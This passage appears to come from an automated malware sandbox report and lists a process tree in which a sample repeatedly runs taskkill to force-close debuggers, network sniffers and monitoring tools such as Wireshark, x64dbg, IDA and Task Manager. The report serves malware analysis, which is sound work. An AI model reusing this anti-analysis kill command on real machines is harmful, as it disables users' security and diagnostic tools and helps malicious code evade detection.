        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4920
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3492
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4012
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1092
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2016
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2232
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4644
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1540
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1620
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4000
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4132
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4756
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3964
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4624
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4168
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:1876
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:1924
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:2204
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:3040
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:2412
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:3944
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:4444
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:4336
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:1936
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:3028
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:3328
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:4904
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:2304
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:4804
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:2320
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:2532
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:2808
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:2144
      - C:\Windows\system32\taskkill.exe
        
